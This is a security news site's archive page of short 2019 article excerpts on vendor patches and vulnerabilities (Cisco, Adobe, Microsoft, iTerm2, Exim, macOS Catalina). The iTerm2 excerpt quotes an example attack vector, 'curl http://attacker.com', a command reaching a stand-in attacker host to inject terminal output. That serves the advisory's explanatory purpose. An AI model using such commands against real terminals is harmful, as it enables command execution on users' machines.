Category Archives: security update

Cisco fixes serious flaws in enterprise-grade Catalyst and Aironet access points

Cisco has released another batch of security updates, the most critical of which fixes a vulnerability that could allow unauthenticated, remote attackers to gain access to vulnerable Cisco Aironet wireless access points. Cisco Aironet APs are enterprise-grade access points used for branch offices, campuses, organizations of all sizes, enterprise and carrier-operator Wi-Fi deployments, and so on.

Cisco Aironet vulnerabilities

During the resolution of a Cisco TAC support case, the company’s technicians discovered a number of …

The post Cisco fixes serious flaws in enterprise-grade Catalyst and Aironet access points appeared first on Help Net Security.

Adobe splats bucketful of bugs in Acrobat and Reader

If you thought that Adobe skipped this month’s Patch Tuesday because there were no immediate vulnerabilities to fix, you were wrong: a week later the company dropped security updates for several of its products, including Acrobat and Reader and the Download Manager. All in all, 82 security holes – most of which are critical – have been plugged. The good news is that none are under active exploitation.

The updates

The update for Adobe Acrobat …


Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will …


October 2019 Patch Tuesday: A small batch of updates from Microsoft, none from Adobe

As predicted by Ivanti’s Chris Goettl, October 2019 Patch Tuesday came with a relatively small number of Microsoft updates and, curiously enough, with no security updates from Adobe. There is no report of any of the Microsoft bugs being exploited, but there is public PoC code for and info about a local privilege escalation flaw in Windows Error Reporting (CVE-2019-1315).

Microsoft’s patches

Microsoft has addressed nearly 60 vulnerabilities, nine of which are critical. Seven of …


macOS Catalina: Security and privacy improvements

Apple has released macOS Catalina (v10.15), a new major release of its desktop operating system, which comes with many functional and security and privacy improvements. The former include a new game subscription service, a feature that extends Mac desktops with iPad as a second display, a new accessibility feature that makes it possible to control Mac entirely by voice, and more. The latter include, among other things, better protections against macOS tampering, an improved Gatekeeper, …


Cisco closes high-impact vulnerabilities in its security offerings

Cisco has fixed 18 high-impact vulnerabilities affecting several of its security offerings and is advising administrators to test and implement the offered security updates as soon as possible. “Successful exploitation of the vulnerabilities could allow an attacker to gain unauthorized access, gain elevated privileges, execute arbitrary commands, or cause a denial of service (DoS) condition on an affected device,” the company said.

About the vulnerabilities

The vulnerabilities affect Cisco ASA (Adaptive Security Appliance) Software, Cisco …


October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most of us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how …


Microsoft will continue providing Windows 7 security updates for SMBs

According to Alert Logic’s latest research, most devices in small and midsize businesses (SMBs) run Windows versions that are expired or are about to expire soon. Luckily for SMBs that don’t want to or can’t upgrade from Windows 7, Microsoft has decided to provide extended security updates (ESU) through January 2023 – if they are willing to pay for them, of course.

Details about the ESU offer

Windows is the most popular desktop operating system …


Guess what? You should patch Exim again!

Hot on the heels of a patch for a critical RCE Exim flaw comes another one that fixes a denial of service (DoS) condition (CVE-2019-16928) that could also be exploited by attackers to pull off remote code execution. With no mitigations available at this time, Exim maintainers urge admins to upgrade to version 4.92.3, which was released on Sunday.

About Exim and the flaw (CVE-2019-16928)

According to E-Soft, Exim is the most widely used …


Microsoft drops emergency Internet Explorer fix for actively exploited zero-day

Microsoft has unexpectedly released out-of-band security updates to fix vulnerabilities in Internet Explorer and Microsoft Defender. The IE zero-day bug is deemed “critical”, as it’s being actively exploited to achieve partial or complete control of a vulnerable system.

The Internet Explorer vulnerability (CVE-2019-1367)

CVE-2019-1367 is a memory corruption vulnerability in the scripting engine that could be exploited to achieve remote code execution. An attacker who successfully exploited the vulnerability could gain the same user rights …


A bug made some Windows Defender antivirus scans fail

Microsoft has released a fix for a bug that made its Windows Defender Antivirus fail after a few seconds when users opted for a Quick or Full scan of the system. Users are advised to implement security intelligence update (virus definitions) v1.301.1684.0 or later to get the software back on track.

Bundled antivirus protection

Windows Defender Antivirus is an anti-malware component of Microsoft Windows 10 – in essence, free antivirus software. The software used to …
